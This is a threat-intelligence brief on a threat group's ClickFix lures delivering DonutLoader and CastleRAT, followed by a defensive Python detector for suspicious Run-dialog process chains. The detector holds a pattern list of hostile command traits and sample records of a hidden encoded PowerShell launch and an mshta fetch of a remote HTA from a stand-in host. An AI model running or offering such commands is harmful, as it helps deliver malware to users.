Termite ransomware breaches linked to ClickFix CastleRAT attacks

Summary

A threat group known as Velvet Tempest is employing a technique called ClickFix, along with legitimate Windows tools, to distribute the DonutLoader malware and the CastleRAT backdoor. This sophisticated approach allows them to maintain persistence and execute further malicious activities.

IFF Assessment

FOE

This is bad news for defenders as it highlights an evolving attack method by a persistent threat actor that leverages legitimate tools to bypass defenses and deploy advanced malware.

Defender Context

Defenders should be aware of the ClickFix technique and the potential use of legitimate Windows utilities by threat actors to deploy malware. Monitoring for unusual process execution chains and the presence of DonutLoader and CastleRAT can help detect and prevent these attacks.
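One concrete form of the process-chain monitoring suggested above, written as an added example rather than anything from the original story: ClickFix lures are known to instruct the victim to paste a command into the Windows Run dialog or a shell, so the telltale record is the interactive shell (explorer.exe) spawning a script host with a hidden-window, encoded or remote-fetch command line. The log format, field names and sample records below are constructed for the example; real Sysmon or EDR process-creation events would need their own parser in place of `parse_event`.

```python
"""Flag ClickFix-style process chains in constructed process-creation records."""
import os
import re
from dataclasses import dataclass

# Script hosts that a pasted ClickFix one-liner is typically handed to.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Parents indicating an interactive user launch (Run dialog, desktop shell).
INTERACTIVE_PARENTS = {"explorer.exe"}
# Command-line traits of a pasted one-liner: hidden window, encoded payload,
# in-memory execution or a remote fetch.
SUSPICIOUS_ARGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|\biex\b|"
    r"invoke-expression|downloadstring|invoke-webrequest|\bcurl\b|https?://)",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line):
    """Parse one tab-separated key=value record (constructed format, not a real Sysmon schema)."""
    kv = dict(part.split("=", 1) for part in line.rstrip("\n").split("\t"))
    return ProcEvent(kv["ParentImage"], kv["Image"], kv["CommandLine"])


def basename(path):
    """Lower-cased file name from a Windows path, regardless of host OS."""
    return os.path.basename(path.replace("\\", "/")).lower()


def classify(ev):
    """Return the reasons an event looks like a ClickFix launch; an empty list means nothing matched."""
    reasons = []
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent in INTERACTIVE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"interactive launch {parent} -> {child}")
    if child in SCRIPT_HOSTS and SUSPICIOUS_ARGS.search(ev.command_line):
        reasons.append("suspicious pasted-command traits in command line")
    return reasons


def detect(lines):
    """Return (record index, reasons) for records showing BOTH signals.

    A lone interactive launch of cmd.exe is everyday admin behaviour, so the
    parent-child chain alone is kept as low-confidence context, not a hit.
    """
    hits = []
    for i, line in enumerate(lines):
        reasons = classify(parse_event(line))
        if len(reasons) == 2:
            hits.append((i, reasons))
    return hits


# Constructed sample records; the base64 blob is a placeholder, not a real payload.
SAMPLE_LOG = [
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB",
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\mshta.exe"
    "\tCommandLine=mshta https://example.invalid/verify.hta",
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\cmd.exe"
    "\tCommandLine=cmd /c dir",
    "ParentImage=C:\\Windows\\System32\\svchost.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for idx, why in detect(SAMPLE_LOG):
        print(f"record {idx}: {'; '.join(why)}")
```

Run against the sample, the first two records (Run-dialog launches of an encoded PowerShell command and a remote HTA) are reported, the plain `cmd /c dir` launch is not, and the scheduled backup script under svchost.exe is ignored entirely. Requiring both signals keeps the rule quiet on ordinary interactive use while still catching the chain the summary describes; tuning the `SUSPICIOUS_ARGS` list to the environment is where the real work lies.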
